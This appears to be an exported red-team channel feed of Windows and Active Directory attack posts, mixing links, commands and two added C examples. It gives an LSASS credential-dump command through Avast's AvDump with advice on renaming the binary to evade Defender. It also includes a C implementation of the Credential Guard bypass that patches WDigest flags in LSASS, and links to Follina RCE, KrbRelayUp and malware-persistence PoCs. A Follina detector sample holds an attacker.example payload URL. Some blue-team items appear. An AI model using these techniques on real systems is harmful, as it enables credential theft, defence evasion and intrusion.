🔐 Dumping LSASS with AV
Sometimes antivirus is an attacker's best friend. Here is how you can use Avast AV to dump LSASS memory.
Command:
.\AvDump.exe --pid 704 --exception_ptr 0 --thread_id 0 --dump_level 1 --dump_file lsass.dmp
(704 is the PID of lsass.exe on the target; look it up first, e.g. with tasklist /FI "IMAGENAME eq lsass.exe".)
To bypass Microsoft Defender, remember to rename the AvDump.exe file. Also, don't name the output lsass.dmp (see screenshot).
There's also a Metasploit post-exploitation module for this:
post/windows/gather/avast_memory_dump
AvDump.exe is located at C:\Program Files\Avast Software\Avast. You can also download AvDump.exe from this link.
VirusTotal details:
https://www.virustotal.com/gui/file/52a57aca1d96aee6456d484a2e8459681f6a7a159dc31f62b38942884464f57b/details
#ad #evasion #lsass #dump #avast #redteam
🔍 LDAP Search Reference
A detailed reference for using ldapsearch for RedTeam operations.
https://malicious.link/post/2022/ldapsearch-reference/
#ad #ldap #ldapsearch #redteam
In reply to: 📜 Abuse AD CS via dNSHostName Spoofing. This blog covers the technical details of CVE-2022-26923, an Active Directory Domain Services elevation of privilege vulnerability via AD CS dNSHostName spoofing. https://research.ifcr.dk/certifried-active-directory-domain…
🛠 DNSHostName Spoofing combined with KrbRelayUp
Domain user to domain admin without first having to add or own a computer account. Step-by-step write-up of the attack in a pure Windows environment.
https://gist.github.com/tothi/f89a37127f2233352d74eef6c748ca25
#ad #adcs #privesc #ldap #relay #redteam
🛠 API Unhooking with Perun's Fart
An article on a new way to evade AV/EDR user-mode hooks: create a process in a suspended state and grab a copy of ntdll.dll from that new process before the AV/EDR has hooked it, then use that clean copy to restore ntdll in your own process.
Research:
https://dosxuz.gitlab.io/post/perunsfart/
PoC:
https://github.com/dosxuz/PerunsFart
#av #edr #evasion #api #unhooking #research
🥇 We are winners
On May 18 and 19, The Standoff was held in conjunction with the Positive Hack Days forum on practical information security.
Hackers found vulnerabilities in corporate and industrial IT infrastructures, and cybersecurity specialists gained experience in preventing unacceptable events. Thousands of spectators. Unexpected decisions. Unforgettable emotions.
Our Codeby team took first place!
I want to sincerely thank each member of the team, you are the best.
Also many thanks to the organizers of the forum for creating such a large-scale event.
In reply to: KrbRelayUp, a universal no-fix local privilege escalation in Windows domain environments where LDAP signing is not enforced (the default). https://github.com/Dec0ne/KrbRelayUp #ad #privesc #kerberos #ldap #relay
⚙️ No-Fix LPE Using KrbRelay with Shadow Credentials
This article explains how to split the shadow credential method that KrbRelayUp uses into several separate steps, giving you more control over how each piece executes. For example, some pieces can be loaded reflectively and others executed normally.
https://icyguider.github.io/2022/05/19/NoFix-LPE-Using-KrbRelay-With-Shadow-Credentials.html
#ad #privesc #kerberos #relay
🛠 S4fuckMe2selfAndUAndU2proxy — A low dive into Kerberos delegations
If you still do not understand the intricacies of Kerberos delegation, you should read this article.
It covers the details of unconstrained delegation, constrained delegation and resource-based constrained delegation, as well as recon and abuse techniques.
https://luemmelsec.github.io/S4fuckMe2selfAndUAndU2proxy-A-low-dive-into-Kerberos-delegations/
#ad #kerberos #delegations #article
Forwarded from Кавычка (crlf)
attacking_bitrix.pdf
3.6 MB
Vulnerabilities and attacks on the Bitrix CMS
1. Features
2. Vulnerabilities
3. Attack methods
Enjoy reading!
🔐 Credential Guard Bypass
The well-known WDigest module, which is loaded by LSASS, has two interesting global variables: g_IsCredGuardEnabled and g_fParameter_UseLogonCredential. Their names are rather self-explanatory: the first holds the state of Credential Guard within the module, the second determines whether clear-text passwords should be stored in memory. By flipping these two values, you can trick the WDigest module into acting as if Credential Guard were not enabled.
Research:
https://itm4n.github.io/credential-guard-bypass/
PoC:
https://github.com/itm4n/Pentest-Windows/blob/main/CredGuardBypassOffsets/poc.cpp
#lsass #wdigest #credential #guard #research
⚙️ WTFBins
WTFBin(n): a binary that behaves exactly like malware, except, somehow, it's not?
A site cataloguing noisy, false-positive-prone binaries; very helpful for building filters for monitoring and hunting rules.
https://wtfbins.wtf/
#wtfbins #blueteam
😴 DeepSleep
A variant of Gargoyle for x64 that hides memory artifacts using only ROP and position-independent code (PIC).
https://github.com/thefLink/DeepSleep
#memory #evasion #maldev
🎁 Application Security Pipelines
(Now with guides)
Scan your code, infrastructure configs and domains with many open source scanners.
Currently supported: trufflehog, gitleaks, bandit, gosec, spotbugs, terrascan, hadolint, retirejs, eslint, phpcs, SonarQube integration, semgrep, arachni, zap, subfinder, nuclei, and more.
All reports are passed to DefectDojo.
Guides:
https://github.com/Whitespots-OU/DevSecOps-Pipelines
Integration examples:
https://gitlab.com/whitespots-public/vulnerable-apps
#appsec #devsecops #pipelines
In reply to: 🔐 Credential Guard Bypass. The well-known WDigest module, which is loaded by LSASS, has two interesting global variables: g_IsCredGuardEnabled and g_fParameter_UseLogonCredential. Their name is rather self explanatory, the first one holds the state of Credential…
🔐 Combination of 2 PoCs for bypassing Credential Guard with in-memory invocation
PoC 1 (patch wdigest.dll):
https://gist.github.com/N4kedTurtle/8238f64d18932c7184faa2d0af2f1240
PoC 2 (find variable offsets in runtime):
https://github.com/itm4n/Pentest-Windows/blob/main/CredGuardBypassOffsets/poc.cpp
Merged:
https://gist.github.com/snovvcrash/43e976779efdd20df1596c6492198c99
#lsass #wdigest #credguard
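Added example for both Credential Guard posts above (the one describing the two WDigest globals and this merged PoC); it is not itm4n's PoC, N4kedTurtle's gist or the merged gist. It shows the two mechanics the bypass rests on: resolving a global's RVA without hard-coded offsets by finding the instruction that reads it and decoding its RIP-relative displacement (target = next instruction RVA + disp32), and writing the new DWORD into another process. The `cmp dword ptr [rip+x], 0` pattern, the "first two matches are the two flags" rule and the code blob being scanned are constructed stand-ins for illustration, not the real wdigest.dll signature.

```c
/* Added example, not itm4n's PoC or the merged gist: the two mechanics of the bypass.
 * (1) find a global in wdigest.dll without hard-coded offsets by locating the instruction that
 *     reads it and decoding its RIP-relative displacement: target = next_insn_rva + disp32;
 * (2) write the new DWORD into LSASS at remote_base + rva (Windows-only glue below).
 * The cmp pattern and the "first two matches are the two flags" rule are a constructed
 * stand-in for illustration, not the real wdigest.dll signature. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Target RVA of a RIP-relative instruction at insn_off whose disp32 sits at disp_off inside it. */
uint32_t resolve_rip_relative(const uint8_t *image, uint32_t insn_off, uint32_t insn_len, uint32_t disp_off) {
    int32_t disp;
    memcpy(&disp, image + insn_off + disp_off, 4);
    return (uint32_t)((int64_t)insn_off + insn_len + disp);
}

/* First offset where pat matches image (mask[j]==0 marks a wildcard byte), or -1. */
long find_pattern(const uint8_t *image, size_t len, const uint8_t *pat, const uint8_t *mask, size_t plen) {
    for (size_t i = 0; i + plen <= len; i++) {
        size_t j = 0;
        while (j < plen && (!mask[j] || image[i + j] == pat[j])) j++;
        if (j == plen) return (long)i;
    }
    return -1;
}

/* 83 3D disp32 00 : cmp dword ptr [rip+disp32], 0 (7 bytes; disp32 at offset 2). */
#define CMP_RIP_LEN 7
static const uint8_t CMP_PAT[CMP_RIP_LEN]  = {0x83, 0x3D, 0, 0, 0, 0, 0x00};
static const uint8_t CMP_MASK[CMP_RIP_LEN] = {1, 1, 0, 0, 0, 0, 1};

/* Hypothetical locator: assumes the first two such cmp instructions test g_IsCredGuardEnabled
 * and g_fParameter_UseLogonCredential, in that order. */
int locate_flags(const uint8_t *image, size_t len, uint32_t *cg_rva, uint32_t *ulc_rva) {
    long a = find_pattern(image, len, CMP_PAT, CMP_MASK, CMP_RIP_LEN);
    if (a < 0) return 0;
    size_t next = (size_t)a + CMP_RIP_LEN;
    long b = find_pattern(image + next, len - next, CMP_PAT, CMP_MASK, CMP_RIP_LEN);
    if (b < 0) return 0;
    *cg_rva  = resolve_rip_relative(image, (uint32_t)a, CMP_RIP_LEN, 2);
    *ulc_rva = resolve_rip_relative(image, (uint32_t)(next + b), CMP_RIP_LEN, 2);
    return 1;
}

/* Constructed wdigest-like blob: two cmp instructions reading two DWORD globals at 0x100 and 0x104. */
#define DEMO_LEN 0x110
void build_demo(uint8_t *img) {
    static const uint8_t code[] = {
        0x83,0x3D,0xE9,0x00,0x00,0x00,0x00,   /* 0x10: cmp [rip+0xE9], 0  -> 0x10+7+0xE9 = 0x100 */
        0x74,0x05,                            /* 0x17: je +5 */
        0x83,0x3D,0xE4,0x00,0x00,0x00,0x00 }; /* 0x19: cmp [rip+0xE4], 0  -> 0x19+7+0xE4 = 0x104 */
    uint32_t cg = 1, ulc = 0;                 /* Credential Guard on, clear-text caching off */
    memset(img, 0, DEMO_LEN);
    memcpy(img + 0x10, code, sizeof code);
    memcpy(img + 0x100, &cg, 4); memcpy(img + 0x104, &ulc, 4);
}

uint32_t demo_cg_rva(void)  { uint8_t img[DEMO_LEN]; uint32_t a = 0, b = 0; build_demo(img); locate_flags(img, DEMO_LEN, &a, &b); return a; }
uint32_t demo_ulc_rva(void) { uint8_t img[DEMO_LEN]; uint32_t a = 0, b = 0; build_demo(img); locate_flags(img, DEMO_LEN, &a, &b); return b; }

/* Flip both flags in the local blob; returns (g_IsCredGuardEnabled << 1) | g_fParameter_UseLogonCredential. */
int demo_flip(void) {
    uint8_t img[DEMO_LEN]; uint32_t cg_rva, ulc_rva, zero = 0, one = 1, cg, ulc;
    build_demo(img);
    if (!locate_flags(img, DEMO_LEN, &cg_rva, &ulc_rva)) return -1;
    memcpy(img + cg_rva, &zero, 4); memcpy(img + ulc_rva, &one, 4);
    memcpy(&cg, img + cg_rva, 4); memcpy(&ulc, img + ulc_rva, 4);
    return (int)((cg << 1) | ulc);            /* 1: CG reported off, clear-text caching on */
}

#ifdef _WIN32
#include <windows.h>
/* Write one DWORD into another process. For LSASS this needs SeDebugPrivilege and fails when
 * LSASS runs as a protected process (RunAsPPL). */
int patch_remote_dword(DWORD pid, void *addr, uint32_t value) {
    HANDLE h = OpenProcess(PROCESS_VM_WRITE | PROCESS_VM_OPERATION, FALSE, pid);
    SIZE_T n = 0; int ok = 0;
    if (!h) return 0;
    ok = WriteProcessMemory(h, addr, &value, sizeof value, &n) && n == sizeof value;
    CloseHandle(h);
    return ok;
}
#endif

int main(void) {
    printf("g_IsCredGuardEnabled @ 0x%x, g_fParameter_UseLogonCredential @ 0x%x, flipped state %d\n",
           demo_cg_rva(), demo_ulc_rva(), demo_flip());
    return 0;
}
```

To turn this into the real thing on Windows you would LoadLibrary wdigest.dll locally, scan its .text with the genuine signature, and use the fact that system DLLs share one base across processes within a boot session, so the remote address is simply the local base plus the resolved RVA. Two practitioner caveats: the flip only affects logons that happen after the patch, so credentials already cached stay protected, and nothing here works against LSASS running as PPL.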
🔍 Find Uncommon Shares
This Python tool, an equivalent of PowerView's Invoke-ShareFinder.ps1, quickly finds uncommon shares in large Windows Active Directory domains.
https://github.com/p0dalirius/FindUncommonShares
#ad #enum #shares #tools
🩸Max (BloodHound)
Maximizing BloodHound with a simple suite of tools
https://github.com/knavesec/Max
#bloodhound #neo4j #cypher
🔥 MS-MSDT Office RCE
MS Office .docx files may contain external OLE object references to HTML files. There is a URI scheme, "ms-msdt:", which invokes the msdt diagnostic tool, and msdt is capable of executing arbitrary code specified in its parameters. The result is a terrifying attack vector: RCE from opening a malicious .docx file, with no macros involved.
Research:
https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e
PoC:
https://github.com/JohnHammond/msdt-follina
https://github.com/chvancooten/follina.py
https://gist.github.com/tothi/66290a42896a97920055e50128c9f040
Demo Follina with Cobalt Strike:
https://www.youtube.com/watch?v=oM4GHtVvv1c
For BlueTeam:
https://gist.github.com/kevthehermit/5c8d52af388989cfa0ea38feace977f2
Everything new is well-forgotten old:
research on this from August 2020, plus a few other payloads.
#office #rce #msmsdt #nomacro
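Added example for the blue team, written for this page and not taken from any of the linked PoCs or the kevthehermit gist: checks for the two artifacts the post describes. The .docx carries, in word/_rels/document.xml.rels, an oleObject relationship with TargetMode="External" whose Target is a remote URL; the HTML it fetches then hands Office an ms-msdt: URI. The rels XML and HTML samples below are constructed for the demo (attacker.example is a placeholder host).

```c
/* Added example, not code from any linked PoC: blue-team checks for the two Follina artifacts.
 * The docx carries, in word/_rels/document.xml.rels, an oleObject relationship with
 * TargetMode="External" whose Target is a remote URL; the HTML it fetches then navigates to an
 * ms-msdt: URI. Both samples below are constructed for this demo. */
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Case-insensitive substring search (strcasestr is not portable). */
static const char *find_ci(const char *hay, const char *needle) {
    size_t n = strlen(needle);
    for (; *hay; hay++) {
        size_t i = 0;
        while (i < n && hay[i] && tolower((unsigned char)hay[i]) == tolower((unsigned char)needle[i])) i++;
        if (i == n) return hay;
    }
    return NULL;
}

/* Walk each <Relationship .../> element; flag an oleObject relationship that points off-disk.
 * Attribute order inside the element does not matter. */
int rels_has_external_ole(const char *xml) {
    const char *p = xml;
    while ((p = find_ci(p, "<Relationship ")) != NULL) {
        const char *end = strchr(p, '>');
        if (!end) break;
        size_t len = (size_t)(end - p);
        char elem[1024];
        if (len >= sizeof elem) len = sizeof elem - 1;
        memcpy(elem, p, len); elem[len] = '\0';
        if (find_ci(elem, "relationships/oleObject") && find_ci(elem, "TargetMode=\"External\"") &&
            (find_ci(elem, "Target=\"http://") || find_ci(elem, "Target=\"https://")))
            return 1;
        p = end;
    }
    return 0;
}

/* Second stage: the fetched HTML hands Office an ms-msdt: URI (literal or via location.href). */
int html_has_msdt_scheme(const char *html) {
    return find_ci(html, "ms-msdt:") != NULL;
}

/* Constructed samples. A normal docx only has relative, internal targets such as styles.xml. */
static const char BENIGN_RELS[] =
    "<?xml version=\"1.0\" encoding=\"UTF-8\"?><Relationships>"
    "<Relationship Id=\"rId1\" Type=\"http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles\""
    " Target=\"styles.xml\"/></Relationships>";
static const char FOLLINA_RELS[] =
    "<Relationships><Relationship Id=\"rId996\""
    " Type=\"http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject\""
    " Target=\"http://attacker.example/payload.html\" TargetMode=\"External\"/></Relationships>";
static const char FOLLINA_HTML[] =
    "<html><script>window.location.href = \"ms-msdt:/id ...\";</script></html>";
static const char BENIGN_HTML[] = "<html><body>Nothing to see here.</body></html>";

int main(void) {
    printf("benign rels: %d, follina rels: %d, follina html: %d, benign html: %d\n",
           rels_has_external_ole(BENIGN_RELS), rels_has_external_ole(FOLLINA_RELS),
           html_has_msdt_scheme(FOLLINA_HTML), html_has_msdt_scheme(BENIGN_HTML));
    return 0;
}
```

A .docx is a zip, so in practice you unzip it and feed word/_rels/document.xml.rels to `rels_has_external_ole`; an external oleObject target is rare enough in legitimate documents to be worth an alert on its own. On the host side, Microsoft's published workaround was to unregister the protocol handler (back it up with `reg export HKEY_CLASSES_ROOT\ms-msdt msdt.reg`, then `reg delete HKEY_CLASSES_ROOT\ms-msdt /f`), and msdt.exe spawned with an Office binary as its parent is the process-creation signal to hunt for.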
📒Simulating attacks with Sysmon
SysmonSimulator is an open-source Windows event simulation utility written in C that can be used to simulate most attacks using Win32 APIs. Blue teams can use it to test EDR detections and correlation rules. I created it to generate attack data for the relevant Sysmon Event IDs.
Attack coverage:
— Process Events
— File Events
— Named Pipes Events
— Registry Actions
— Image Loading
— Network Connections
— Create Remote Thread
— Raw Access Read
— DNS Query
— WMI Events
— Clipboard Capture
— Process Image Tampering
Research:
https://rootdse.org/posts/understanding-sysmon-events/
Tool:
https://github.com/ScarredMonk/SysmonSimulator
#sysmon #simulator #blueteam #lab
🕵️ OSINT Collection
Collection of 4000+ OSINT resources
https://metaosint.github.io/table
#osint #recon #collection
Forwarded from 1N73LL1G3NC3
Malware development: persistence - part 1. Registry run keys. C++ example.
Malware development: persistence - part 2. Screensaver hijack. C++ example.
Malware development: persistence - part 3. COM DLL hijack.
Forwarded from 1N73LL1G3NC3
Malware development: persistence - part 4. Windows services. Simple C++ example.
Malware development: persistence - part 5. AppInit_DLLs. Simple C++ example.
Malware development: persistence - part 6. Windows netsh helper DLL. Simple C++ example.